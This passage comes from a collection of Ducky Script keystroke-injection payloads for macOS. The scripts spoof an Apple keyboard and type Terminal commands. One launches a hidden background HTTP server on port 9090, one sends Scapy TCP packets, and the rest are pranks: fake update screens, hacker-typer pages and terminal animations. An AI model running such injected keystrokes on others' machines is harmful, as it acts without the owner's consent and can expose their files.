' > index.html 31 | ENTER 32 | DELAY 500 33 | STRING nohup python3 -m http.server 9090 > /dev/null 2>&1 & 34 | ENTER 35 | DELAY 500 36 | 37 | 38 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/TCP Randomizer.txt: -------------------------------------------------------------------------------- 1 | REM This script sets up a TCP randomization technique 2 | REM Using Scapy to randomize the TCP packets by introducing random delays 3 | REM between sending each packet. 4 | REM This helps to obfuscate the packet timing. 5 | REM Also adds an element of randomness to the network traffic. 6 | REM Keep in mind that while it adds some level of randomness, 7 | REM it doesn't guarantee complete anonymity or security. 8 | 9 | 10 | REM This runs 1000 randomized TCP packets which last about 5 minutes. 11 | REM You can change the 'send_packet(packet) for _ in range(1000)' parameter to extend the time. 12 | REM For example if you change to 2000 this will last about 10 minutes. 13 | REM Adjust the values of min_delay and max_delay as per your requirement. 14 | 15 | REM Requirements:Python 3, and Scapy can install using the command 'pip3 install scapy' 16 | REM warnings can be ignored as they indicate that no IPv4 address is currently assigned to those interfaces. 17 | REM The script will continue to function as intended 18 | 19 | 20 | REM Author: Narsty 21 | REM Title: TCP Randomizer 22 | REM Target: MacOS 23 | REM Version: 1.0 24 | REM Category: Obscurity 25 | 26 | ID 05ac:021e Apple:Keyboard 27 | DELAY 500 28 | GUI SPACE 29 | DELAY 500 30 | STRING Terminal 31 | DELAY 1000 32 | ENTER 33 | DELAY 500 34 | STRING python3 -c 'import random, time; from scapy.all import *; min_delay = 0.1; max_delay = 0.5; packet = IP() / TCP(); send_packet = lambda pkt: (time.sleep(random.uniform(min_delay, max_delay)), send(pkt)); [send_packet(packet) for _ in range(1000)]' 35 | DELAY 1000 36 | ENTER 37 | 38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/ASCII Aquarium.txt: -------------------------------------------------------------------------------- 1 | REM Runs ASCII Aquarium Animation in Terminal 2 | REM Required Apps: Terminal, asciiquarium (installed via Homebrew) 3 | 4 | 5 | REM Title: ASCII Aquarium 6 | REM Author: Narsty 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: Prank 10 | 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | GUI SPACE 15 | DELAY 100 16 | STRING terminal.app 17 | DELAY 500 18 | ENTER 19 | DELAY 1000 20 | CTRL c 21 | DELAY 250 22 | GUI CTRL f 23 | DELAY 700 24 | STRING brew install asciiquarium 25 | DELAY 500 26 | ENTER 27 | DELAY 16000 28 | STRING asciiquarium 29 | DELAY 250 30 | ENTER 31 | 32 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Cat Flickering Terminal.txt: -------------------------------------------------------------------------------- 1 | REM Displays colorful cat animation 2 | REM Flickering Terminal "Happy Hacking Day!" 3 | 4 | 5 | REM Title: Cat Flickering Terminal 6 | REM Author: Narsty 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: Prank 10 | 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 1000 15 | GUI SPACE 16 | DELAY 500 17 | STRING Terminal 18 | DELAY 500 19 | ENTER 20 | DELAY 500 21 | GUI-CTRL f 22 | DELAY 2000 23 | STRING clear 24 | ENTER 25 | DELAY 500 26 | STRING brew install nyancat 27 | ENTER 28 | DELAY 16000 29 | STRING nyancat -f 200 -s 30 | ENTER 31 | DELAY 6000 32 | STRING clear 33 | ENTER 34 | DELAY 500 35 | STRING tput cup 0 0 36 | ENTER 37 | DELAY 500 38 | STRING while true; do printf '\e[1;31m'; printf 'HAPPY '; printf '\e[1;32m'; printf 'HACKING '; printf '\e[1;33m'; printf 'DAY! '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf ' '; printf '\e[1;37m'; printf ' '; sleep 0.2; clear; printf '\e[1;31m'; printf ' '; printf '\e[1;32m'; printf ' '; printf '\e[1;33m'; printf ' '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf 'HAPPY '; printf '\e[1;37m'; printf 'HACKING '; printf '\e[1;31m'; printf 'DAY! '; printf '\e[1;32m'; printf ' '; sleep 0.2; clear; printf '\e[1;31m'; printf ' '; printf '\e[1;32m'; printf ' '; printf '\e[1;33m'; printf ' '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf 'HAPPY '; printf '\e[1;37m'; printf 'HACKING '; printf '\e[1;31m'; printf 'DAY! '; printf '\e[1;32m'; printf ' '; sleep 0.2; clear; printf '\e[1;31m'; printf ' '; printf '\e[1;32m'; printf ' '; printf '\e[1;33m'; printf ' '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf 'HAPPY '; printf '\e[1;37m'; printf 'HACKING '; printf '\e[1;31m'; printf 'DAY! '; printf '\e[1;32m'; printf ' '; sleep 0.2; clear; done 39 | ENTER 40 | DELAY 500 41 | STRING clear 42 | ENTER 43 | DELAY 1000 44 | STRING echo "Happy Hacking Day! Enjoy the show!" 45 | ENTER 46 | DELAY 3000 47 | STRING exit 48 | ENTER 49 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Fake Update.txt: -------------------------------------------------------------------------------- 1 | REM Title: Fake Update 2 | REM Author: Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | 8 | REM Accesses The Terminal Opens URL and goes into Full Screen 9 | ID 05ac:021e Apple:Keyboard 10 | DELAY 300 11 | GUI SPACE 12 | DELAY 500 13 | STRING terminal.app 14 | DELAY 1000 15 | ENTER 16 | DELAY 1500 17 | STRING open http://fakeupdate.net/apple/ 18 | ENTER 19 | DELAY 1000 20 | GUI-CTRL F 21 | DELAY 250 22 | 23 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacke3 Typer.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacke3_Typer 2 | REM Author: UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | 8 | 9 | ID 05ac:021e Apple:Keyboard 10 | DELAY 1000 11 | GUI SPACE 12 | DELAY 200 13 | STRING terminal 14 | DELAY 1000 15 | ENTER 16 | DELAY 1000 17 | STRING open -a Safari 'https://geektyper.com/cyberpunk/' 18 | DELAY 1000 19 | ENTER 20 | DELAY 1000 21 | GUI-CTRL F 22 | DELAY 500 23 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 24 | DELAY 500 25 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 26 | DELAY 500 27 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 28 | DELAY 1500 29 | RIGHTARROW 30 | DELAY 1500 31 | LEFTARROW 32 | DELAY 1500 33 | STRING 3 34 | DELAY 1500 35 | SHIFT 36 | DELAY 1500 37 | STRING 1 38 | DELAY 1500 39 | STRING 6 40 | DELAY 1500 41 | STRING 4 42 | DELAY 1500 43 | STRING 2 44 | DELAY 1500 45 | STRING 5 46 | DELAY 1500 47 | STRING 7 48 | DELAY 1500 49 | STRING 9 50 | DELAY 1500 51 | STRING 8 52 | DELAY 5000 53 | BACKSPACE 54 | DELAY 500 55 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 56 | DELAY 500 57 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 58 | DELAY 500 59 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 60 | DELAY 500 61 | STRING 0 62 | DELAY 500 63 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 64 | DELAY 500 65 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 66 | DELAY 500 67 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 68 | DELAY 500 69 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 70 | DELAY 500 71 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 72 | DELAY 500 73 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 74 | UPARROW 75 | DELAY 500 76 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 77 | DELAY 500 78 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 79 | DELAY 500 80 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 81 | DELAY 500 82 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 83 | DELAY 500 84 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 85 | DELAY 500 86 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 87 | DELAY 5000 88 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 89 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacker Typer Blue.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacker Typer Blue 2 | REM Author: UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | 8 | ID 05ac:021e Apple:Keyboard 9 | DELAY 1000 10 | GUI SPACE 11 | DELAY 200 12 | STRING terminal 13 | DELAY 1000 14 | ENTER 15 | DELAY 1000 16 | STRING open -a Safari 'https://geektyper.com/blue/' 17 | DELAY 1000 18 | ENTER 19 | DELAY 1000 20 | GUI-CTRL F 21 | DELAY 500 22 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 23 | DELAY 500 24 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 25 | DELAY 500 26 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 27 | DELAY 1500 28 | RIGHTARROW 29 | DELAY 1500 30 | LEFTARROW 31 | DELAY 1500 32 | STRING 3 33 | DELAY 1500 34 | SHIFT 35 | DELAY 1500 36 | STRING 1 37 | DELAY 1500 38 | STRING 6 39 | DELAY 1500 40 | STRING 4 41 | DELAY 1500 42 | STRING 2 43 | DELAY 1500 44 | STRING 5 45 | DELAY 1500 46 | STRING 7 47 | DELAY 1500 48 | STRING 9 49 | DELAY 1500 50 | STRING 8 51 | DELAY 5000 52 | BACKSPACE 53 | DELAY 500 54 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 55 | DELAY 500 56 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 57 | DELAY 500 58 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 59 | DELAY 500 60 | STRING 0 61 | DELAY 500 62 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 63 | DELAY 500 64 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 65 | DELAY 500 66 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 67 | DELAY 500 68 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 69 | DELAY 500 70 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 71 | DELAY 500 72 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 73 | UPARROW 74 | DELAY 500 75 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 76 | DELAY 500 77 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 78 | DELAY 500 79 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 80 | DELAY 500 81 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 82 | DELAY 500 83 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 84 | DELAY 500 85 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 86 | DELAY 5000 87 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 88 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacker Typer F Society.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacker Typer F Society 2 | REM Author:UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | 8 | ID 05ac:021e Apple:Keyboard 9 | DELAY 1000 10 | GUI SPACE 11 | DELAY 200 12 | STRING terminal 13 | DELAY 1000 14 | ENTER 15 | DELAY 1000 16 | STRING open -a Safari 'https://geektyper.com/fsociety/' 17 | DELAY 1000 18 | ENTER 19 | DELAY 1000 20 | GUI-CTRL F 21 | DELAY 500 22 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 23 | DELAY 500 24 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 25 | DELAY 500 26 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 27 | DELAY 1500 28 | RIGHTARROW 29 | DELAY 1500 30 | LEFTARROW 31 | DELAY 1500 32 | STRING 3 33 | DELAY 1500 34 | SHIFT 35 | DELAY 1500 36 | STRING 1 37 | DELAY 1500 38 | STRING 6 39 | DELAY 1500 40 | STRING 4 41 | DELAY 1500 42 | STRING 2 43 | DELAY 1500 44 | STRING 5 45 | DELAY 1500 46 | STRING 7 47 | DELAY 1500 48 | STRING 9 49 | DELAY 1500 50 | STRING 8 51 | DELAY 5000 52 | BACKSPACE 53 | DELAY 500 54 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 55 | DELAY 500 56 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 57 | DELAY 500 58 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 59 | DELAY 500 60 | STRING 0 61 | DELAY 500 62 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 63 | DELAY 500 64 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 65 | DELAY 500 66 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 67 | DELAY 500 68 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 69 | DELAY 500 70 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 71 | DELAY 500 72 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 73 | UPARROW 74 | DELAY 500 75 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 76 | DELAY 500 77 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 78 | DELAY 500 79 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 80 | DELAY 500 81 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 82 | DELAY 500 83 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 84 | DELAY 500 85 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 86 | DELAY 5000 87 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop